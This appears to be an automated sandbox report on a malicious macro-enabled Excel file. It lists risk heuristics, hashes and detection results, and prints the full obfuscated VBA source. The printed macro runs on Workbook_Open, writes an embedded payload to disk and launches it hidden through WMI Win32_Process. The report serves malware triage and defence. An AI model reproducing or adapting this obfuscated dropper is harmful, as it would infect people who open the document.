MALICIOUS
110
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set sKDd_llzjtSmOwvFoWpXhW__QLm = GetObject(Un_icZnyoCsbZcWYftWjqet.rT_zTedUwxLSkaqKK_k_r).SpawnInstance_ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8576 bytes |
SHA-256: 0d72e01ede9925dde5be27701ced9e78443c7ec652241eb5f853465c2b033c43 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
119 of 236 identifiers look randomly generated (e.g. 'IJDDVKPLgCzk_oDzjjoORvkRoUbogX') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsNull (YhPlffeoOjzh)
IsError ("BPkk3OkHZMO6")
Pj4Rr1f_o0qisQ = IsMissing(IsObject(K77Ug9n))
G_eoMPfNlEFnJx.fZxOghdfFDRHPVKbyPCoKA__bcTt
IYQ9a0Q = IsNull(IsEmpty(oCHLJ3))
jbVfST_7R5b5 = IsDate(IsObject(EUwtmxz))
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "nEAacyWypNGnso_UqQKY"
Attribute VB_Base = "0{0BFAB574-1335-42CB-A04E-FFE1FFCD5530}{2F5A7568-DF14-4F2F-804C-1CB75105E1B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function mfbZHmaVft()
PefwUl_2NkynY = IsMissing("ZapC9Y")
IsNull (IsArray("uncR8620V4xz"))
pi7coh = IsNumeric(IsDate(N5LiEC_1HyYj))
mfbZHmaVft = Mid("mUW^EF2%W\tXSLLoa3!fP<2Ba/", 12, 3)
IsObject (TqQKHr)
IsDate (VGAJkRE_Rem5C)
IsNumeric (IsNull(NJYjQYk))
End Function
Function skQfUGAYIiMIPJQcAH_LbebB()
IsDate ("PIJrX3nky26ll")
skQfUGAYIiMIPJQcAH_LbebB = Range("HE173")
IsError (IsDate(mq7zQ0j))
LGXiR0k = IsDate(IsNumeric("OgjmSAs"))
End Function
Attribute VB_Name = "NmeLqu_epiD_ExaiNav"
Function tpKyawAgb__sZHbmwxVJ_NpX()
IsArray (IsMissing(bf4g9ut_3aKm6))
jg8IJ7RT0dAHe = IsObject("QCTCraF9E1aR")
IsEmpty (IsArray(O9fDOVx))
qsBYM2sMqmu = IsDate(Wx4701)
IsObject (Ih6AXz)
IsMissing (IsNull("gvVDbojgZVYl"))
db7VgRK4o39ng = IsNull(IsNull("U36SbBKFCVVx"))
AHfmUXAxmeqaH_kjRIebiJLpTW = nEAacyWypNGnso_UqQKY.mfbZHmaVft
xYLxKQi = IsEmpty(IsEmpty("A1XZpmfSRPg"))
EypeFnobLG0 = IsNull("Qt735voa7mb")
DRVQJ2s = IsEmpty(IsObject(AswWw6o))
tpKyawAgb__sZHbmwxVJ_NpX = Join(Array(Mid("^OtAv/2261.g|+N5&0Y\HHkAY6", 6, 6) & AHfmUXAxmeqaH_kjRIebiJLpTW))
IsError (IsNumeric(VPZWz1l_UwZ9c))
OE3slWidyMhh = IsNull(IsDate(RN20bY))
AjnTm6d_jmZUOb = IsNumeric("NUIPZtE")
End Function
Function GWNUZW_l_wOPkIBszmbzDX()
IsDate ("oRkPq0")
GWNUZW_l_wOPkIBszmbzDX = Range("DL109")
IsObject (Uxyzzq7)
IsEmpty (WoKupC)
End Function
Attribute VB_Name = "Un_icZnyoCsbZcWYftWjqet"
Function rT_zTedUwxLSkaqKK_k_r()
IsDate (IsError(puFwrBFrmJC))
IsDate (L3rlyz_yI0kM)
IsEmpty (IsNumeric(WPfG0bT))
wCDiUw = IsDate(b30MpWLEQ3s)
zS5lkK_fIGgn = IsDate("S2fe5yiCghfM9")
IJDDVKPLgCzk_oDzjjoORvkRoUbogX = ChrW(115)
RcE_bLzjnqAEZER = Chr(58) _
ZAMrUXBkBupBZOuXNDA__ESEC_CZg = ChrW(CLng((xlDialogGridlines Or ((1.50247479061941E-04 * -281) * -829))))
hz_bCnfXf = Chr(CLng((Not -120)))
GC7oCN_RVSzQ = IsMissing("CWSeXX_51yZs")
IsEmpty ("HBlT55t")
IrU_TCFI_shHBFScRJAFV_Y_dmqB = Chr(CLng((Not (xlEdgeTop + (446 + -566#)))))
GpWrfg_f = ChrW(110) _
SniNxXvEapjJQwzgck = ChrW(CLng((0.1099324975892 * 1037)))
SFAvNm_d = Chr(116)
jmG_QmDXalDajnO = Mid("|/$*q96|(M/qx6\cimv2:Win32_ProcessStartupy3lan9vH", 15, 27)
tisjUDIjux = ChrW(CLng((Not -110))) _
r0baGpY = IsDate(IsDate("Mzecrpn"))
dKGFQhEgbY_X_Urthw = ChrW(CLng((-0.181019332161687 * (-814 - (-0.468451242829828 * 523)))))
EnqpcKm = IsDate(IsMissing(ZO8f37))
IsMissing ("EoMUWPmIiERS")
UuHPnwWxIKHeCLppbij = ChrW(CLng((-82 + (0.172382671480144 * (1357 - 249#)))))
rT_zTedUwxLSkaqKK_k_r = hz_bCnfXf + Chr(105) + GpWrfg_f + UuHPnwWxIKHeCLppbij + dKGFQhEgbY_X_Urthw + tisjUDIjux + ChrW(116) + IJDDVKPLgCzk_oDzjjoORvkRoUbogX + RcE_bLzjnqAEZER + ChrW(92) _
+ SniNxXvEapjJQwzgck + IrU_TCFI_shHBFScRJAFV_Y_dmqB + ZAMrUXBkBupBZOuXNDA__ESEC_CZg + SFAvNm_d + jmG_QmDXalDajnO
IsMissing (nJdmPfg)
IsNumeric ("aLrtPOKhYGhe3")
kM4B6Hs_nSU7NF = IsArray("s9MiKHZj0ox")
End Function
Function eMylMhixoADfCL()
IsMissing (IsNull(hxlqTW))
eMylMhixoADfCL = Range("BG129")
O0UuNw2 = IsMissing("M4ojUqk")
IsArray (IsObject("eQzthuR"))
End Function
Attribute VB_Name = "Css_HKYMcdXhqVJomYMIgk_Ho"
Attribute VB_Base = "0{661806D4-A531-45B1-9E5B-347E398CBC98}{DCDB2694-6801-4D7D-95D1-DFDEA612B179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function sKDd_llzjtSmOwvFoWpXhW__QLm()
IsNull ("U0aw01")
IsMissing (IsDate("Y0zlUR"))
IsMissing (IsObject(YKYDU40))
Set sKDd_llzjtSmOwvFoWpXhW__QLm = GetObject(Un_icZnyoCsbZcWYftWjqet.rT_zTedUwxLSkaqKK_k_r).SpawnInstance_
IsEmpty ("SiNnVMdV5oN5")
COUsCj_xC8Tst = IsEmpty("NvBdZR1")
IsArray (dWHnM2)
With sKDd_llzjtSmOwvFoWpXhW__QLm
.ShowWindow = CLng((xlDialogWindowSize And xlImmediatePane))
End With
ro0I0H7 = IsEmpty(IsArray("ypG94e_4U7KoA"))
IsError (Z6cWgo)
IsObject (H9Etnz)
End Function
Attribute VB_Name = "pgyJE_p_WIBpZrVaRpBDANEaEVBG"
Function tSIZ_qpFD()
IsArray (IsNumeric(HeLrpy_JIn0J))
rhDFxL_25T3P = IsNumeric("AA4UnCq_760H5F")
Pdy1eEn = IsMissing("QFDsdc")
IsArray (IsNull("FQLqtl_08zQzk"))
IsEmpty (IsError(Rv4OvZr))
lWdsu_jMQcM = nEAacyWypNGnso_UqQKY.skQfUGAYIiMIPJQcAH_LbebB
L6xjIX_kL2STG = IsObject(IsArray("CTOqQAwWCYfJ"))
vvKCYReWOOVGQVoLDFGcTmYL = Range("BM72")
IsNumeric ("YihEW606rQn9c")
Eoyzgw = IsEmpty(YTYlQWI)
Q2F3xu = IsNull("Jko5d6")
IsArray (IsEmpty(TCVrT8T))
VzeJbJIlhyVo = IsEmpty("Q1IROXs_nAzmge")
blHCyyhCR_BZDO = Mid("<7*$apcd+!&wrQ/:Vpv", 12, 1)
cD3gb2Z_vA5Coo = IsDate(dvy1PK_d5VXv)
HC3G3n_VwqeSQ = IsEmpty(IsEmpty("C5n2bfQ"))
q_mVjHDqxtIWXzFHxROHu = Range("EA250")
tSIZ_qpFD = blHCyyhCR_BZDO & q_mVjHDqxtIWXzFHxROHu & lWdsu_jMQcM & vvKCYReWOOVGQVoLDFGcTmYL
IsEmpty ("ndJv3WQ")
IsEmpty ("oTQnkzyJUVR")
IsNumeric (IsMissing("IsZJKHdG7dp7"))
End Function
Function OmSZYvgiAzsWNrcYZE_KtYI()
IsDate (q4lL2Y_bxJZf0)
IsError (IsArray(uRAHx6f))
CYxgxGgeQgxUM = Un_icZnyoCsbZcWYftWjqet.eMylMhixoADfCL
RsnkyX3 = IsError(IsNull(BJN5T89))
IsDate (IsDate("GWKCuu_2XT0PV"))
lHhrmDd = IsMissing(IsArray(XbEYQZ_AAada))
OmSZYvgiAzsWNrcYZE_KtYI = Join(Array(CYxgxGgeQgxUM + Mid("xxNbbKrEIauj4get /formatvO+(*we", 14, 11) + NmeLqu_epiD_ExaiNav.GWNUZW_l_wOPkIBszmbzDX))
O1MqjL0Rq75n = IsNull("BjAnWp")
IsNumeric (IsDate("cCj0AWT"))
IsNumeric (RV6Sm9xjpAQG)
End Function
Attribute VB_Name = "G_eoMPfNlEFnJx"
Attribute VB_Base = "0{B5216F02-1A2A-45BD-B25D-0E2CD9EED118}{40613307-087E-4FB2-975E-9C47F9B673CF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fZxOghdfFDRHPVKbyPCoKA__bcTt()
Dim F__oNeOufWVamVUR As String
Y0DHTA = IsDate(IsObject("KEfdIKD"))
eVuuUT5ZFdXP = IsDate(BeYV13V6p8QL)
F__oNeOufWVamVUR = Replace(nEAacyWypNGnso_UqQKY.ArEjTVtbLtespyYMTInADeril.Text, "gPjOnb", "")
KmQ3R5GEdVRr = IsObject(IsDate(O1FBuR))
IQRRB9v5ct52 = IsDate(IsNull("jfwo7ZmcjBQb"))
XyLm2EZ = IsNull(WBIKzBW)
Open Application.ActiveWorkbook.Path & NmeLqu_epiD_ExaiNav.tpKyawAgb__sZHbmwxVJ_NpX For Binary As #CLng((xlMoveAndSize And xlOutline))
IsNull (IsNull(DtEE9wfvlan))
SFPOs1Q_lRqK6 = IsDate(IsDate(kAxDXv_rrP2j))
Put #CLng((Not (-1.75438596491228E-02 * 114))), , F__oNeOufWVamVUR
IsArray (IsDate("Y246BlI_WbIbS"))
IsArray (IsNumeric("YHkekQH_HccJR"))
Close #CLng((xlPrintErrorsBlank And xlPaperLetter))
hThyf4 = IsNull(IsNull("ZxZLuA"))
IsDate (chTjif5glTWs)
udoOgecOH
PZlIDqV = IsDate("HHleLxz")
IsObject (AMKoV97)
End Function
Function udoOgecOH()
v5PuZB_uZXTRr = IsEmpty(sqc1sBe_3xRBEh)
IsDate (Dqukqo)
IsObject (IsEmpty(TQnahFw_DkBtv))
With GetObject(pgyJE_p_WIBpZrVaRpBDANEaEVBG.tSIZ_qpFD)
.Create pgyJE_p_WIBpZrVaRpBDANEaEVBG.OmSZYvgiAzsWNrcYZE_KtYI & Chr(34) & Application.ActiveWorkbook.Path & NmeLqu_epiD_ExaiNav.tpKyawAgb__sZHbmwxVJ_NpX & Chr(34), Null, Css_HKYMcdXhqVJomYMIgk_Ho.sKDd_llzjtSmOwvFoWpXhW__QLm
End With
QaClkKRHxLhY = IsMissing(IsEmpty("SR0las"))
IsArray ("arLldT")
IsDate ("Q6kS14")
TmKduh_kwnpZ = IsMissing("ABD4Z6d")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 56832 bytes |
SHA-256: a01c3d4b04d0a6f3b23771556da1e338374e797ad7a3791adadcd45675aa091c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
575 of 954 identifiers look randomly generated (e.g. 'gPjOnbQVngPjOnb2w_0NgPjOnbN_iop6gPjOnb_d') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.